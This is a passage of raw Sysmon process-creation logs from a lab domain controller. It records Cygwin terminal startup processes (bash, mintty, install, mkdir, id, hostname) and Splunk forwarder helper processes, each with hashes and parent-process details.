Files\Python38\python.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-54A8-6078-E40C-00000000AE01}3508C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059738Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:48.023{A8622C2F-54A8-6078-E40C-00000000AE01}3508C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059702Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.859{A8622C2F-54A2-6078-E30C-00000000AE01}5700C:\cygwin64\bin\tzset.exe-----"C:\cygwin64\bin\tzset.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9A334E31142D616401445D77D38B145A,SHA256=3D76C166E2D05B23A6E164B1F9C251C771AEF4E423B00C2EBE4080682C93C243,IMPHASH=36078269731E740E482547ADAAC73406{A8622C2F-54A2-6078-E20C-00000000AE01}920C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059691Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.849{A8622C2F-54A2-6078-E20C-00000000AE01}920C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-E10C-00000000AE01}7016C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059681Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.841{A8622C2F-54A2-6078-E10C-00000000AE01}7016C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.821{A8622C2F-54A2-6078-E00C-00000000AE01}7040C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-54A2-6078-DF0C-00000000AE01}4288C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.813{A8622C2F-54A2-6078-DF0C-00000000AE01}4288C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-DE0C-00000000AE01}5628C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059649Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.805{A8622C2F-54A2-6078-DE0C-00000000AE01}5628C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.794{A8622C2F-54A2-6078-DD0C-00000000AE01}2824C:\cygwin64\bin\install.exe-----"C:\cygwin64\bin\install.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=184F23D6CE222C67B7CBD57C6B6B9C62,SHA256=A27AF4601F4A7F4BC2CB7B9FC1ECB0ACEFBE58B1322C5BD4B5AF5EB62409BE29,IMPHASH=796EF09DDA984EA31CD00B864D8AA564{A8622C2F-54A2-6078-DC0C-00000000AE01}1028C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059627Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.785{A8622C2F-54A2-6078-DC0C-00000000AE01}1028C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-D40C-00000000AE01}3868C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059616Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.774{A8622C2F-54A2-6078-DB0C-00000000AE01}184C:\cygwin64\bin\install.exe-----"C:\cygwin64\bin\install.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=184F23D6CE222C67B7CBD57C6B6B9C62,SHA256=A27AF4601F4A7F4BC2CB7B9FC1ECB0ACEFBE58B1322C5BD4B5AF5EB62409BE29,IMPHASH=796EF09DDA984EA31CD00B864D8AA564{A8622C2F-54A2-6078-DA0C-00000000AE01}1496C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059606Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.766{A8622C2F-54A2-6078-DA0C-00000000AE01}1496C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-D40C-00000000AE01}3868C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059596Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.756{A8622C2F-54A2-6078-D90C-00000000AE01}6852C:\cygwin64\bin\install.exe-----"C:\cygwin64\bin\install.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=184F23D6CE222C67B7CBD57C6B6B9C62,SHA256=A27AF4601F4A7F4BC2CB7B9FC1ECB0ACEFBE58B1322C5BD4B5AF5EB62409BE29,IMPHASH=796EF09DDA984EA31CD00B864D8AA564{A8622C2F-54A2-6078-D80C-00000000AE01}5496C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059586Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.748{A8622C2F-54A2-6078-D80C-00000000AE01}5496C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-D40C-00000000AE01}3868C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.733{A8622C2F-54A2-6078-D70C-00000000AE01}5148C:\cygwin64\bin\install.exe-----"C:\cygwin64\bin\install.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=184F23D6CE222C67B7CBD57C6B6B9C62,SHA256=A27AF4601F4A7F4BC2CB7B9FC1ECB0ACEFBE58B1322C5BD4B5AF5EB62409BE29,IMPHASH=796EF09DDA984EA31CD00B864D8AA564{A8622C2F-54A2-6078-D60C-00000000AE01}4420C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.725{A8622C2F-54A2-6078-D60C-00000000AE01}4420C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-D40C-00000000AE01}3868C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059550Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.709{A8622C2F-54A2-6078-D50C-00000000AE01}5828C:\cygwin64\bin\find.exe-----"C:\cygwin64\bin\find.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C17DC689E2E9C2AF759E7A3046DE8F1D,SHA256=77371827DA82B14D29999F738B77F53053833BE5C0257DC85E8A091ABB662789,IMPHASH=58AC74B0A7539EFE91A9196817FF689C{A8622C2F-54A2-6078-D30C-00000000AE01}6248C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059545Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.708{A8622C2F-54A2-6078-D40C-00000000AE01}3868C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059535Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.701{A8622C2F-54A2-6078-D30C-00000000AE01}6248C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059523Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.692{A8622C2F-54A2-6078-D20C-00000000AE01}5276C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-54A2-6078-D10C-00000000AE01}4860C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059513Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.684{A8622C2F-54A2-6078-D10C-00000000AE01}4860C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059502Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.668{A8622C2F-54A2-6078-D00C-00000000AE01}5628C:\cygwin64\bin\id.exe-----"C:\cygwin64\bin\id.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=5800D64A2799F3182F90A7DBC34B5B1D,SHA256=0B939F24A18CBAF7C8FBBF8A8AE4F474CBDF61BD54870D687A584DA4B29E1FD3,IMPHASH=7D3F9B4155D2A624AD839B9C7F2F075A{A8622C2F-54A2-6078-CF0C-00000000AE01}4268C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059492Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.659{A8622C2F-54A2-6078-CF0C-00000000AE01}4268C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CE0C-00000000AE01}6492C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059482Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.651{A8622C2F-54A2-6078-CE0C-00000000AE01}6492C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.634{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CC0C-00000000AE01}5412C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000059445Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.618{A8622C2F-54A2-6078-CC0C-00000000AE01}5412C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-54A2-6078-C90C-00000000AE01}4568C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000059426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.361{A8622C2F-54A2-6078-CA0C-00000000AE01}1736C:\cygwin64\bin\cygwin-console-helper.exe-----"\\?\C:\cygwin64\bin\cygwin-console-helper.exe" 0x418 0x41CC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8BFA89E9045A949619C8511955C39779,SHA256=7B4BB51FC16D1B4F44D2A73D9939C177008D5DB4E9EECCA42A9D01D90D7C8CEF,IMPHASH=DC4FCFEBC59A5F04DB2C6D852B01071C{A8622C2F-54A2-6078-C90C-00000000AE01}4568C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000059391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.141{A8622C2F-54A2-6078-C90C-00000000AE01}4568C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000059143Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:22.840{A8622C2F-548E-6078-C50C-00000000AE01}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059125Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:20.903{A8622C2F-548C-6078-C40C-00000000AE01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059113Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:20.221{A8622C2F-548C-6078-C30C-00000000AE01}5832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059103Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:19.665{A8622C2F-548B-6078-C20C-00000000AE01}4336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:17.681{A8622C2F-5489-6078-C10C-00000000AE01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059068Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:16.999{A8622C2F-5488-6078-C00C-00000000AE01}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059057Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:16.379{A8622C2F-5488-6078-BF0C-00000000AE01}1736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058904Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:57:22.830{A8622C2F-5452-6078-BE0C-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058884Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:57:20.985{A8622C2F-5450-6078-BD0C-00000000AE01}920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058874Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:57:20.319{A8622C2F-5450-6078-BC0C-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058864Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:57:19.646{A8622C2F-544F-6078-BB0C-00000000AE01}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058853Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:57:17.693{A8622C2F-544D-6078-BA0C-00000000AE01}6196C:\Program 